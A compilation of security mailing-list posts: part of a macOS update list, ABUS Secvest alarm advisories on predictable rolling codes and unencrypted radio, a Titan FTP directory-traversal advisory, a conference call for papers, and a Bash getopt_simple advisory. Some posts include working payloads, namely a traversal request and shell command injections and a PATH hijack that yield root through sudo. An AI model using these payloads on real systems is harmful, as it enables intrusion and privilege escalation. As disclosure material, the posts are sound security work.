macOS Mojave 10.14.3 Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher DiskArbitration Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3 Impact: An encrypted volume may be unmounted and remounted by a different user without prompting for the password Description: A logic issue was addressed with improved state management. CVE-2019-8522: Colin Meginnis (@falc420) FaceTime Available for: macOS Mojave 10.14.3 Impact: A user's video may not be paused in a FaceTime call if they exit the FaceTime app while the call is ringing Description: An issue existed in the pausing of FaceTime video. The issue was resolved with improved logic. CVE-2019-8550: Lauren Guzniczak of Keystone Academy Feedback Assistant Available for: macOS Mojave 10.14.3 Impact: A malicious application may be able to gain root privileges Description: A race condition was addressed with additional validation. CVE-2019-8565: CodeColorist of Ant-Financial LightYear Labs Feedback Assistant Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3 Impact: A malicious application may be able to overwrite arbitrary files Description: This issue was addressed with improved checks. CVE-2019-8521: CodeColorist of Ant-Financial LightYear Labs file Available for: macOS Mojave 10.14.3 Impact: Processing a maliciously crafted file might disclose user information Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2019-6237: an anonymous researcher Graphics Drivers Available for: macOS Mojave 10.14.3 Impact: An application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2019-8519: Aleksandr Tarasikov (@astarasikov), Juwei Lin (@panicaII) and Junzhi Lu of Trend Micro Research working with Trend Micro's Zero Day Initiative iAP Available for: macOS Mojave 10.14.3 Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher IOGraphics Available for: macOS Mojave 10.14.3 Impact: A Mac may not lock when disconnecting from an external monitor Description: A lock handling issue was addressed with improved lock handling. CVE-2019-8533: an anonymous researcher, James Eagan of Télécom ParisTech, R. Scott Kemp of MIT, Romke van Dijk of Z-CERT IOHIDFamily Available for: macOS Mojave 10.14.3 Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: A memory corruption issue was addressed with improved state management. CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team IOKit Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3 Impact: A local user may be able to read kernel memory Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8504: an anonymous researcher IOKit SCSI Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-8529: Juwei Li
[FD] [SYSS-2018-036]: ABUS Secvest Remote Control - Denial of Service - Uncontrolled Resource Consumption (CWE-400)
Advisory ID: SYSS-2018-036 Product: ABUS Secvest Remote Control (FUBE50014, FUBE50015) Manufacturer: ABUS Affected Version(s): n/a Tested Version(s): n/a Vulnerability Type: Denial of Service - Uncontrolled Resource Consumption (CWE-400) Risk Level: Low Solution Status: Open Manufacturer Notification: 2018-11-21 Solution Date: - Public Disclosure: 2019-03-25 CVE Reference: CVE-2019-9860 Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert Overview: ABUS Secvest FUBE50014 and FUBE50015 are wireless remote controls for the ABUS Secvest wireless alarm system. Some of the device features as described by the manufacturer are (see [1]): " * User-friendly remote control with easily identifiable symbols * Features ‘arm’, ‘disarm’ and ‘status query’ keys * 8 LEDs provide an overview and display current system status * Button for custom configuration available (Secvest wireless alarm system only) * Optional manual panic alarm available (Secvest wireless alarm system only) * Encrypted signal transmission * Rolling Code Thanks to the rolling code process this product is protected against so-called replay attacks. All controlling signals between this product and the Secvest alarm panel are in individualised and thus, are not able to be reproduced by third parties. This process is protected from third party tampering, and exceeds the requirements of the DIN EN 50131-1 level 2 security standard. " Due to unencrypted signal communication and predictability of rolling codes, an attacker can "desynchronize" an ABUS Secvest wireless remote control regarding its controlled Secvest wireless alarm system, so that sent commands by the remote control are not accepted anymore. Vulnerability Details: Thomas Detert found out that the claimed "Encrypted signal transmission" of the Secvest wireless remote control FUBE50014 is not present (see SySS security advisory SYSS-2018-035 [2]) and that the implemented rolling codes are predictable (see SySS security advisory SYSS-2018-034 [3]). By exploiting these two security issues, an attacker can simply desynchronize a wireless remote control by observing the current rolling code state, generating many valid rolling codes, and use them before the original wireless remote control. The Secvest wireless alarm system will ignore sent commands by the wireless remote control until the generated rolling code happens to match the window of valid rolling code values again. Depending on the number of used rolling codes by the attacker, a resynchronization without actually reconfiguring the wireless remote control could take quite a lot of time and effectless button presses. SySS found out that the new ABUS Secvest remote control FUBE50015 is also affected by this security vulnerability. Proof of Concept (PoC): Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz transceiver that allows disarming the alarm system in an unauthorized way. He provided his tool including documentation and source to SySS GmbH for responsible disclosure purposes. Based on Mr. Detert's PoC tool, SySS GmbH developed a Python tool for the RFCat-based radio dongle YARD Stick One (see [4]) for demonstrating this simple denial-of-service (DoS) attack against the ABUS Secvest wireless remote controls FUBE50014 and FUBE50015. This tool simply generates many valid rolling codes based on the current observed state and uses them resulting in desynchronizing the original wireless remote control. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2018-11-21: Vulnerability reported to manufacturer 2018-11-28: Vulnerability reported to manufacturer once more 2018-12-12: E-mail to ABUS support asking if they are going to give some feedback regarding the reported security issue 2018-12-12: Phone call with ABUS support, the reported security advisories were forwarded to the ABUS Security Center Support 2018-12-12: E-mail to ABUS Security Center Support asking if they are going to give some feedback regarding the reported security issue 2019-01-14: Updated information regarding remote control ABUS Secvest FUBE50015 2019-03-25: Public release of security advisory References: [1] Product website for ABUS Secvest wireless remote control https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Secvest-Wireless-Remote-Control2 [2] SySS Security Advisory SYSS-2018-0
[FD] [SYSS-2018-035]: ABUS Secvest Remote Control - Missing Encryption of Sensitive Data (CWE-311)
Advisory ID: SYSS-2018-035 Product: ABUS Secvest Remote Control (FUBE50014, FUBE50015) Manufacturer: ABUS Affected Version(s): n/a Tested Version(s): n/a Vulnerability Type: Missing Encryption of Sensitive Data (CWE-311) Risk Level: High Solution Status: Open Manufacturer Notification: 2018-11-21 Solution Date: - Public Disclosure: 2019-03-25 CVE Reference: CVE-2019-9862 Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert Overview: ABUS Secvest FUBE50014 and FUBE50015 are wireless remote controls for the ABUS Secvest wireless alarm system. Some of the device features as described by the manufacturer are (see [1]): " * User-friendly remote control with easily identifiable symbols * Features ‘arm’, ‘disarm’ and ‘status query’ keys * 8 LEDs provide an overview and display current system status * Button for custom configuration available (Secvest wireless alarm system only) * Optional manual panic alarm available (Secvest wireless alarm system only) * Encrypted signal transmission * Rolling Code Thanks to the rolling code process this product is protected against so-called replay attacks. All controlling signals between this product and the Secvest alarm panel are in individualised and thus, are not able to be reproduced by third parties. This process is protected from third party tampering, and exceeds the requirements of the DIN EN 50131-1 level 2 security standard. " Due to the missing "Encrypted signal transmission", an attacker is able to eavesdrop sensitive data as cleartext, for instance the current rolling code state. Vulnerability Details: Thomas Detert found out that the claimed "Encrypted signal transmission" of the Secvest wireless remote control FUBE50014 is not present at all. Thus, an attacker observing radio signals of an ABUS FUBE50014 wireless remote control is able to see all sensitive data of transmitted packets as cleartext and can analyze the used packet format and the communication protocol. For instance, this security issue could successfully be exploited to observe the current rolling code state of the wireless remote control and deduce the cryptographically weak used rolling code algorithm (see SySS security advisory SYSS-2018-034 [2]). SySS found out that the new ABUS Secvest remote control FUBE50015 is also affected by this security vulnerability. Proof of Concept (PoC): Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz transceiver that allows disarming the alarm system in an unauthorized way. He provided his tool including documentation and source to SySS GmbH for responsible disclosure purposes. SySS GmbH could successfully perform a disarming attack against an ABUS Secvest wireless alarm system by exploiting the unencrypted signal transmission of the ABUS Secvest wireless remote controls FUBE50014 and FUBE50015 and the predictable rolling code implementation using either Mr. Detert's PoC tool, a developed Python tool for the RFCat-based radio dongle YARD Stick One (see [3]), or a eZ430-Chronos (see [4]) with a specially developed firmware. Successful disarming attacks against an ABUS Secvest wireless alarm system are shown in our SySS proof-of-concept video "ABUS Secvest Rolling Code PoC Attack" [7]. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2018-11-21: Vulnerability reported to manufacturer 2018-11-28: Vulnerability reported to manufacturer once more 2018-12-12: E-mail to ABUS support asking if they are going to give some feedback regarding the reported security issue 2018-12-12: Phone call with ABUS support, the reported security advisories were forwarded to the ABUS Security Center Support 2018-12-12: E-mail to ABUS Security Center Support asking if they are going to give some feedback regarding the reported security issue 2019-01-14: Updated information regarding remote control ABUS Secvest FUBE50015 2019-03-25: Public release of security advisory References: [1] Product website for ABUS Secvest wireless remote control https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Control-devices-and-extensions/Secvest-Wireless-Remote-Control2 [2] SySS Security Advisory SYSS-2018-034 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-034.txt [3] Product website YARD Stick One https://greatscottgadgets.com/yardstickone/ [4] Product website for Texas Instruments eZ430-Chronos http://ww
[FD] [SYSS-2018-034]: ABUS Secvest - Rolling Code - Predictable from Observable State (CWE-341)
Advisory ID: SYSS-2018-034 Product: ABUS Secvest (FUAA5) Manufacturer: ABUS Affected Version(s): v3.01.01 Tested Version(s): v3.01.01 Vulnerability Type: Rolling Code - Predictable from Observable State (CWE-341) Risk Level: High Solution Status: Open Manufacturer Notification: 2018-11-21 Solution Date: - Public Disclosure: 2019-03-25 CVE Reference: CVE-2019-9863 Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert Overview: ABUS Secvest (FUAA5) is a wireless alarm system with different features. Some of the supported features as described by the manufacturer are (see [1]): " * Convenient operation via the app (Android/iOS), integrated web browser and also at the alarm panel * For up to 50 users with freely selectable control options (code/chip key/remote control) * Active intrusion protection in combination with additional mechatronic wireless window/door locks * Video verification of alarms via email, push notifications or via the app * Up to 48 individually identifiable wireless detectors, eight control panels, 50 remote controls * Integrated dialling device * VdS Home certified and EN 50131-1 Level 2 * Alarm verification via the integration of up to six IP cameras * 32 additional wireless outputs for flexible event control * Switching to monitoring station via protocols possible " Due to the use of an insecure algorithm for rolling codes, an attacker is able to predict valid future rolling codes and can thus remotely control the ABUS Secvest wireless alarm system in an unauthorized way. Vulnerability Details: Thomas Detert found out that the rolling codes implemented as replay protection (see SySS security advisory SYSS-2016-117 [2]) in the radio communication protocol used by the ABUS Secvest wireless alarm system (FUAA5) and its remote control (FUBE50014, FUB50015) is cryptographically weak. Thus, an attacker observing the unencrypted radio signals of an ABUS FUBE50014 or FUBE50015 wireless remote control (see SySS security advisory SYSS-2018-035 [6]) is able to deduce the implemented rolling code algorithm and to correctly predict valid future rolling codes. This enables an attacker to remotely control affected wireless alarm systems in an unauthorized manner, for instance disarming the wireless alarm system at will. Proof of Concept (PoC): Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz transceiver that allows disarming the alarm system in an unauthorized way. He provided his tool including documentation and source to SySS GmbH for responsible disclosure purposes. SySS GmbH could successfully perform a disarming attack against an ABUS Secvest wireless alarm system by exploiting the unencrypted signal transmission of the ABUS Secvest wireless remote controls FUBE50014 and FUBE50015 and the predictable rolling code implementation using either Mr. Detert's PoC tool, a developed Python tool for the RFCat-based radio dongle YARD Stick One (see [3]), or a eZ430-Chronos (see [4]) with a specially developed firmware. Successful disarming attacks against an ABUS Secvest wireless alarm system are shown in our SySS proof-of-concept video "ABUS Secvest Rolling Code PoC Attack" [8]. Solution: SySS GmbH is not aware of a solution for this reported security vulnerability. Disclosure Timeline: 2018-11-21: Vulnerability reported to manufacturer 2018-11-28: Vulnerability reported to manufacturer once more 2018-12-12: E-mail to ABUS support asking if they are going to give some feedback regarding the reported security issue 2018-12-12: Phone call with ABUS support, the reported security advisories were forwarded to the ABUS Security Center Support 2018-12-12: E-mail to ABUS Security Center Support asking if they are going to give some feedback regarding the reported security issue 2019-01-14: Updated information regarding remote control ABUS Secvest FUBE50015 2019-03-25: Public release of security advisory References: [1] Product website for ABUS Secvest wireless alarm system https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System [2] SySS Security Advisory SYSS-2016-117 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-117.txt [3] Product website YARD Stick One https://greatscottgadgets.com/yardstickone/ [4] Product website for Texas Instruments eZ430-Chronos http://www.ti.com/tool/EZ430-CHRONOS [5] SySS Security Advisory SYSS
[FD] CVE-2019-10009 Titan FTP Server Version 2019 Build 3505 Directory Traversal/Local File Inclusion
** Discovered By: Kevin Randall on 3/23/2019 ** A Directory Traversal issue was discovered in the Web GUI in Titan FTP Server 2019 Build 3505. When an authenticated user attempts to preview an uploaded file (through PreviewHandler.ashx) by using a \..\..\ technique, arbitrary files can be loaded in the server response outside the root directory. *** Tools used: Parrot OS Windows 7 32 Bit BurpSuite Browser * Vulnerability has been fixed in the following build: Build: Titan FTP Server 2019 Build 3515 ** Proof of Concept (PoC): Step 1: Authenticate through Titan FTP Web GUI Step 2: Upload file and attempt to view it Step 3: Intercept requests with BurpSuite when attempting to view uploaded file Step 4: Modify "path=" and "filename=" parameters in the following GET request: Ex: View contents of README.txt file in Python27 directory: Note: You can access other files in directories such as System32, Desktop etc. Payload: * GET /PreviewHandler.ashx?path=\..\..\..\..\Python27\README.txt&filename=README.txt * Step 5: If path is set-up correctly and if file exists, you will receive a 200 OK back from the server. Step 6: View the file through the file preview in the FTP server. ** ** Timeline: Date Discovered: 3/23/2019 Date Disclosed to Vendor: 3/23/2019 CVE Obtained: 3/24/2019 Vendor Created Patched Version Titan FTP Version 2019 Build 3515: 3/25/2019 Vendor Created Entry in Jira System for issue (SVR-499): 3/25/2019 Date Disclosed: 3/26/2019 ** ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Recon 2019 Call For Papers - June 28 - 30, 2019 - Montreal, Canada
Recon Montreal - Call For Papers - June 28 - 30 - 2019 Welcome to TeleMate! ATDT1514XXX CONNECT 300 .. DATAPAC : DATAPAC: Call connected to This is a private system. Access attempts are logged. Unauthorized access may result in prosecution. Bienvenue! ++ + + + + + + + \ / + _- _+_ - ,__ _=..:. /=\ _|===|_ ||::| | |_|.| | | | | | __===_ -=- ||::| |==| | | __|.:.| /\| |:. | || | .|| : |||::| | |- |.:|_|. :__ |.: |--|==| | .| |_ | ' |. ||. |||:.| __|. | |_|. | |.|...||---| |==| | | | |_--. || |||. | | | | |. | | |::.||: .| |==| | . : |=|===|:|| . ||| .| |:.| .| | | | |:.:|| . | |==| | |=|===| . |' | | | | | | | |' : . | ; ;'| ' : ` : '. ' . . : ' . R E C O N 2 0 1 9 . `.. ' . C F P . june 28 to 30, 2019 montreal, quebec . + Hi - Flash back from 2008 .. + We are back ╔═╩╗ # C F P # ╚══╗ We are now inviting speakers to submit proposals ║ for Recon Montreal 2019. ║ ║ Some guidelines for talks are: ║ ║ - 30 or 60 minute presentations ║ ║ - We are open to proposals for workshops that would occur alongside ║ talks ║ ║ - There will be time for five to ten minute informal lightning talks ║ during the REcon party ║ ║ ║ ║ ╔══╝ ╚══╗ ║ _ _ _ ║ | _ \ ___ __ _(_)___| |_ _ __ __ _| |_(_) ___ _ __ ║ | |_) / _ \/ _` | / __| __| '__/ _` | __| |/ _ \| '_ \ ║ | _ < __/ (_| | \__ \ |_| | | (_| | |_| | (_) | | | | █╗ ║ |_| \_\___|\__, |_|___/\__|_| \__,_|\__|_|\___/|_| |_| ║ ║ |___/ ║ ║ ║ ║ Registration for the conference and training sessions is now open. ║ ║ - - - - - - - - ║ ║ You can register at: https://tickets.recon.cx/reconmtl/2019/ ║ ║ ║ ║ ║ ║ ║ ║ ║ ║ _ _ █╩═╣ |_ _| __ __ _(_)_ __ (_)_ __ __ _ ║ | || '__/ _` | | '_ \| | '_ \ / _` | ║ | || | | (_| | | | | | | | | | (_| | ║ |_||_| \__,_|_|_| |_|_|_| |_|\__, | █═══╗ ║ |___/║ ║ ║ ║ ║ ║ This year we have another great set of trainings available: ║ ║ ║ ║
[FD] Repeat of CVE-2018-4251 in Razer Laptops
Razer has a vulnerability affecting all current laptops, where the SPI Flash is set to full read/write and the Intel CPU is left in ME Manufacturing Mode. This allows for attackers to safeguard rootkits with Intel Boot Guard, downgrade the BIOS to exploit older vulnerabilities such as Meltdown, and many other things. They have yet to look into getting a CVE assigned, saying it isn't necessary. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2019-007] Code Execution via Insecure Shell Function getopt_simple
Advisory: Code Execution via Insecure Shell Function getopt_simple
RedTeam Pentesting discovered that the shell function "getopt_simple",
as presented in the "Advanced Bash-Scripting Guide", allows execution of
attacker-controlled commands.
Details
===
Product: Advanced Bash-Scripting Guide
Affected Versions: all
Fixed Versions: -
Vulnerability Type: Code Execution
Security Risk: medium
Vendor URL: https://www.tldp.org/LDP/abs/html/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-007
Advisory Status: private
CVE: CVE-2019-9891
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9891
Introduction
The document "Advanced Bash-Scripting Guide" [1] is a tutorial for
writing shell scripts for Bash. It contains many example scripts
together with in-depth explanations about how shell scripting works.
More Details
During a penetration test, RedTeam Pentesting was able to execute
commands as an unprivileged user (www-data) on a server. Among others,
it was discovered that this user was permitted to run the shell script
"cleanup.sh" as root via "sudo":
$ sudo -l
Matching Defaults entries for user on srv:
env_reset, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on srv:
(root) NOPASSWD: /usr/local/sbin/cleanup.sh
The script "cleanup.sh" starts with the following code:
#!/bin/bash
getopt_simple()
{
until [ -z "$1" ]
do
if [ ${1:0:2} = '--' ]
then
tmp=${1:2} # Strip off leading '--' . . .
parameter=${tmp%%=*} # Extract name.
value=${tmp##*=} # Extract value.
eval $parameter=$value
fi
shift
done
}
target=/tmp
# Pass all options to getopt_simple().
getopt_simple $*
# list files to clean
echo "listing files in $target"
find "$target" -mtime 1
The function "getopt_simple" is used to set variables based on
command-line flags which are passed to the script. Calling the script
with the argument "--target=/tmp" sets the variable "$target" to the
value "/tmp". The variable's value is then used in a call to "find". The
source code of the "getopt_simple" function has been taken from the
"Advanced Bash-Scripting Guide" [2]. It was also published as a book.
RedTeam Pentesting identified two different ways to exploit this
function in order to run attacker-controlled commands as root.
First, a flag can be specified in which either the name or the value
contain a shell command. The call to "eval" will simply execute this
command.
$ sudo /usr/local/sbin/cleanup.sh '--redteam=foo;id'
uid=0(root) gid=0(root) groups=0(root)
listing files in /tmp
$ sudo /usr/local/sbin/cleanup.sh '--target=$(id)'
listing files in uid=0(root) gid=0(root) groups=0(root)
find: 'uid=0(root) gid=0(root) groups=0(root)': No such file or directory
$ sudo /usr/local/sbin/cleanup.sh '--target=$(ls${IFS}/)'
listing files in bin
boot
dev
etc
[...]
Instead of injecting shell commands, the script can also be exploited by
overwriting the "$PATH" variable:
$ mkdir /tmp/redteam
$ cat < /tmp/redteam/find
#!/bin/sh
echo "executed as root:"
/usr/bin/id
EOF
$ chmod +x /tmp/redteam/find
$ sudo /usr/local/sbin/cleanup.sh --PATH=/tmp/redteam
listing files in /tmp
executed as root:
uid=0(root) gid=0(root) groups=0(root)
Workaround
==
No workaround available.
Fix
===
Replace the function "getopt_simple" with the built-in function
"getopts" or the program "getopt" from the util-linux package.
Examples on how to do so are included in the same tutorial [3][4].
Security Risk
=
If a script with attacker-controlled arguments uses the "getopt_simple"
function, arbitrary commands may be invoked by the attackers. This is
particularly interesting if a privilege boundary is crossed, for example
in the context of "sudo". Overall, this vulnerability is rated as a
medium risk.
Timeline
2019-02-18 Vulnerability identified
2019-03-20 Customer approved disclosure to vendor
2019-03-20 Author notified
2019-03-20 Author responded, document is not updated/maintained any more
2019-03-20 CVE ID requested
2019-03-21 CVE ID assigned
2019-03-26 Advisory released
References
==
[1] https://www.tldp.org/LDP/abs/html/
[2] https://www.tldp.org/LDP/abs/html/string-manipulation.html#GETOPTSIMPLE
[3] https://www.tldp.org/LDP/
